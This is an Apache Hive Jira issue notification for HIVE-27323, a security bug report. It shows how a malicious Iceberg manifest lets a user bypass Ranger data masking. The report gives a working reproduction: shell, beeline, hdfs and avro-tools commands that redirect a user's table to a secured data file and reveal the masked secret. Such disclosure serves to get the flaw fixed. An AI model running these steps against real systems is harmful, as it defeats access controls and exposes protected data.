[ 
https://issues.apache.org/jira/browse/HIVE-27323?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Attila Turoczy updated HIVE-27323:
----------------------------------
    Labels: check  (was: )

> Iceberg: malformed manifest file or list can cause data breach
> --------------------------------------------------------------
>
>                 Key: HIVE-27323
>                 URL: https://issues.apache.org/jira/browse/HIVE-27323
>             Project: Hive
>          Issue Type: Bug
>          Components: Iceberg integration
>    Affects Versions: 4.0.0-alpha-2
>            Reporter: Janos Kovacs
>            Priority: Blocker
>              Labels: check
>
> Set to bug/blocker instead of enhancement due to its security related nature, 
> Hive4 should not be released w/o fix for this. Please reset if needed.
>  
> Fyi: it's similar to HIVE-27322 but this is more based on Iceberg's internals 
> and can't just be fixed via the storagehandler authorizer.
>  
> Context: 
>  * There are some core tables with sensitive data that users can only query 
> with data masking enforced (e.g. via Ranger). Let's assume this is the 
> `default.icebergsecured` table.
>  * An end-user can only access the masked form of the sensitive data as 
> expected...
>  * The users also have privilege to create new tables in their own sandbox 
> databases - let's assume this is the `default.trojanhorse` table for now.
>  * The user can create a malicious table that exposes the sensitive data 
> non-masked leading to a possible data breach.
>  * Hive runs with doAs=false to be able to enforce FGAC and prevent end-user 
> direct file-system access needs
> Repro:
>  * First make sure the data is secured by the masking policy:
> {noformat}
> <kinit as privileged user>
> beeline -e "
> DROP TABLE IF EXISTS default.icebergsecured PURGE;
> CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string) 
> STORED BY ICEBERG;
> INSERT INTO default.icebergsecured VALUES ('You might be allowed to see 
> this.','You are NOT allowed to see this!');
> "
> <kinit as end user>
> beeline -e "
> SELECT * FROM default.icebergsecured;
> "
> +------------------------------------+--------------------------------+
> |         icebergsecured.txt         |     icebergsecured.secret      |
> +------------------------------------+--------------------------------+
> | You might be allowed to see this.  | MASKED BY RANGER FOR SECURITY  |
> +------------------------------------+--------------------------------+
> {noformat}
>  * Now let the user to create the malicious table exposing the sensitive data:
> {noformat}
> <kinit as end user>
> beeline -e "
> DROP TABLE IF EXISTS default.trojanhorseviadata;
> CREATE EXTERNAL TABLE default.trojanhorseviadata (txt string, secret string) 
> STORED BY ICEBERG
> LOCATION '/some-user-writeable-location/trojanhorseviadata';
> INSERT INTO default.trojanhorseviadata VALUES ('placeholder','placeholder');
> "
> SECURE_DATA_FILE=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal"
>   beeline --outputformat=csv2 --showHeader=false --verbose=false 
> --showWarnings=false --silent=true --report=false -e "SELECT file_path FROM 
> default.icebergsecured.files;" 2>/dev/null)
> TROJAN_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal"
>  beeline -e "DESCRIBE FORMATTED default.trojanhorseviadata;" 2>/dev/null 
> |grep metadata_location  |grep -v previous_metadata_location | awk '{print 
> $5}')
> TROJAN_MANIFESTLIST_LOCATION=$(hdfs dfs -cat $TROJAN_META_LOCATION |grep 
> "manifest-list"  |cut -f4 -d\")
> hdfs dfs -get $TROJAN_MANIFESTLIST_LOCATION
> TROJAN_MANIFESTLIST=$(basename $TROJAN_MANIFESTLIST_LOCATION)
> TROJAN_MANIFESTFILE_LOCATION=$(avro-tools tojson $TROJAN_MANIFESTLIST |jq 
> '.manifest_path' |tr -d \")
> hdfs dfs -get $TROJAN_MANIFESTFILE_LOCATION
> TROJAN_MANIFESTFILE=$(basename $TROJAN_MANIFESTFILE_LOCATION)
> mv ${TROJAN_MANIFESTFILE} ${TROJAN_MANIFESTFILE}.orig
> avro-tools tojson ${TROJAN_MANIFESTFILE}.orig |jq --arg fp 
> "$SECURE_DATA_FILE" '.data_file.file_path = $fp' > ${TROJAN_MANIFESTFILE}.json
> avro-tools getschema ${TROJAN_MANIFESTFILE}.orig > 
> ${TROJAN_MANIFESTFILE}.schema
> avro-tools fromjson --codec deflate --schema-file 
> ${TROJAN_MANIFESTFILE}.schema ${TROJAN_MANIFESTFILE}.json > 
> ${TROJAN_MANIFESTFILE}.new
> hdfs dfs -put -f ${TROJAN_MANIFESTFILE}.new $TROJAN_MANIFESTFILE_LOCATION
> beeline -e "SELECT * FROM default.trojanhorseviadata;"
> +------------------------------------+-----------------------------------+
> |       trojanhorseviadata.txt       |     trojanhorseviadata.secret     |
> +------------------------------------+-----------------------------------+
> | You might be allowed to see this.  | You are not allowed to see this!  |
> +------------------------------------+-----------------------------------+
> {noformat}
>  
> There are actually multiple options to create such table and modify the 
> manifest/list like reuse parts of the iceberg code or just use spark which 
> needs direct end-user write access to the file-system, etc.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)

Reply via email to